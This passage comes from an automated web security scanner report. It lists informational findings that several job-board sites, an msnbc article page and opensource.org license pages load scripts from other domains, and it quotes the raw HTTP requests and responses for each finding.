Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 131870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.383. http://www.mediajobcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mediajobcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:20 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bppv1icf1cusbde0ltp6efc6u0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122753

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.384. http://www.medicalschoolloans.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.medicalschoolloans.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://128.121.234.97/livechat/livehelp_js.php?department=3&pingtimes=15
http://www.google-analytics.com/urchin.js
http://www.studentloanfoundation.org/tmviewbanner.php?lpgid=114&wsid=189&cid=4204&bid=350&compid=43&style=js&lpgprty=B&tp=B

Request

GET / HTTP/1.1
Host: www.medicalschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:49 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p6p8q6ke8luivjdor0r4lolo34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92734

<script language="javascript" type="text/javascript" src="http://www.medicalschoolloans.com/script/overlibmws.js"></script>
<script language="javascript" type="text/javascript" src="http://www.medical
...[SNIP]...

   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

           <script type="text/javascript" title="MSL Live Chat" src="http://128.121.234.97/livechat/livehelp_js.php?department=3&pingtimes=15"></script>
...[SNIP]...
</noscript><script language='JavaScript' type='text/javascript' src='http://www.studentloanfoundation.org//tmviewbanner.php?lpgid=114&wsid=189&cid=4204&bid=350&compid=43&style=js&lpgprty=B&tp=B'></script>
...[SNIP]...

15.385. http://www.militarycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.militarycrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a4ria9ol92rvm2rjro93htql36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104750

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.386. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41161439/ns/politics-more_politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7544
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41161439/ns/politics-more_politics/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Fri, 21 Jan 2011 23:39:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 84830

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.msn.com/j/MSNBC/Components/Photo/_new/g-pol-110119-Obama-poll-144p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7544"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

15.387. http://www.nursingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nursingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t4okj4bg6oif378439t4l99v56; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104463

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.388. http://www.occupationaltherapycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.occupationaltherapycrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a2a5vtclildmv21469nm7krd85; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106436

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.389. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.390. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.391. http://www.operationscrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.operationscrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pb54cpbbhj2rk90gr90bf4h334; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.392. http://www.parttimecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parttimecrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ij1mnbg5ljm83h4g6kns0vi4c5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110601

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.393. http://www.pharmaceuticalcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pharmaceuticalcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kufoga5sm934qb7mfhn708np70; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119431

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
